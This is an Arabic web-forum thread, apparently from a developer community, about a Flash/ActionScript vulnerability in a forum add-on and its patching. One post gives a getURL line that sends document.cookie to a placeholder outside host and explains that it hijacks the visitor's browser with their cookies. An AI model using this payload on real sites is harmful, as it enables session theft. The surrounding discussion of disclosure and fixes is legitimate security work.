المشاركة الأصلية كتبت بواسطة علي2003
لا ليست موجوده والموجود هو ثغره جديده كلياً وغير معلنه وسوف اقوم بإصدار ترقيعاً لها إن شاء الله في القريب العاجل.
المشاركة الأصلية كتبت بواسطة علي2003
لا ليست موجوده والموجود هو ثغره جديده كلياً وغير معلنه وسوف اقوم بإصدار ترقيعاً لها إن شاء الله في القريب العاجل.
__________________
al3ndaleeb[@]uk2.net
السلام عليكم ورحمة الله وبركاته
كم اشتقت لهذه الحورات والنقاشات اخوتي .. تابعو فهذه سوالف كما عهدتها ..
**** مداخله ****
اخاواني .. اعتقد انه يمكن تنفيذ السكربت في اكشن (فلاش) و (السويش)
مثال على ذلك انه بالإمكان عمل اي فريم لصفحه في السويتش
كود PHP:
onSelfEvent (release) {
iframeLoad("mainIframe","http://www.google.com");
}
onSelfEvent (release) {
iframeLoad("mainIframe","introduction.html");
}
onSelfEvent (release) {
iframeHide("mainIframe");
}
onSelfEvent (release) {
iframeShow("mainIframe");
}
onSelfEvent (release) {
iframeDelete("mainIframe");
}
هذا والله اعلم .. هل باإمكان عمل نقطه دخول للموقع من ملف فلاش ام لا
__________________
منابر المتميز | شبكة المتميز
حالياً في الأردن : 962777775774
-----------------------------------
مطور ويب / JS(incl AJAX) , PHP, XML
تتبعني في Twitter
المشاركة الأصلية كتبت بواسطة العندليب
موجوده جربتها على منتداي وفعاله 100%
المصدر رسلته لك بالإميل
__________________
█████████
█████████
█████████
يمكن إدراج امر
كود PHP:
getURL("http://www.xxx.com/page.php?Cookie='+document.cookie");
داخل الفلاش نفسه وبالتالي لايمكن منع اي امر من التنفيد وهو يقوم بنقل المتصفح الى الموقع الذي تريد وهو محمل بالكوكيز الخاص بالمستخدم ..
__________________
█████████
█████████
█████████
حياكم الله جميعا
بخصوص ماذكره الأخ علي2003 عن الـ ActionScript
فهذا مصدري لحل المشكله
http://www.adobe.com/devnet/security...mpsb02-08.html
وسبق وأن ذكرت هذه الملاحظات والحلول في ترقيع ثغرة الفلاش على الروابط التالي:
http://www.swalif.net/softs/showthread.php?t=124138
http://www.swalif.net/softs/showthread.php?t=124376
فأرجو منكم عدم ذكر اي استثمارات هنا يا اخواني اذا تمت تجربة ماذكرتم على اصدارات ازرار اضافيه
وارجوا ذكر الاصدار المصاب وسأسعى عاجلا لإدراج حل للمشكله.
موفقين
__________________
al3ndaleeb[@]uk2.net
آسف أخوي :shy:المشاركة الأصلية كتبت بواسطة العندليب
الإصدار المصاب : الإزرار الإضافية 3.x لجريح .
جربت آخر ترقيع http://www.swalif.net/softs/showpost...3&postcount=48
لكن الثغرة لا زالت موجودة !
تحيتي
__________________
█████████
█████████
█████████